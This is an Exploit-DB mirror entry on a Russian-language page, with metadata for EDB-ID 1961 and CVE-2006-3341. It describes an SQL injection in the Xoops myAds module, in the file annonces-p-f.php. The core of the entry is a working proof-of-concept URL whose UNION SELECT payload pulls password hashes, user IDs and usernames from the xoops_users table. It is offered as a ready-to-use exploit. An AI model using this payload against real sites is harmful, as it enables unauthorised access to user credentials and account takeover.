- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 1961
- Проверка EDB
-
- Пройдено
- Автор
- KEYCODER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-3341
- Дата публикации
- 2006-06-28
Код:
#######################################
# Xoops myAds module SQL-Injection
# Discovered: KeyCoder <Turkish Coder>
# Visit : www.grisapka.org
# Contact: [email protected]
# Thanx: SecretlyX-BeLa
#######################################
---------------------------------------
# Details :
# Xoops myAds module SQL-Injection Vulnerability
# Website : http://www.xoops.org/
# Vulnerable File : annonces-p-f.php
# PoC : http://host/path/modules/myAds/annonces-p-f.php?op=[SQL]
---------------------------------------
Vulnerability:
SQL-injection
http://www.site.com/modules/myAds/annonces-p-f.php?op=ImprAnn&lid=-1+union+select+1,pass,uid,uname,5,6,7,8,9,10,11,12,13+from+xoops_users+limit+1,1/*
# milw0rm.com [2006-06-28]- Источник
- www.exploit-db.com
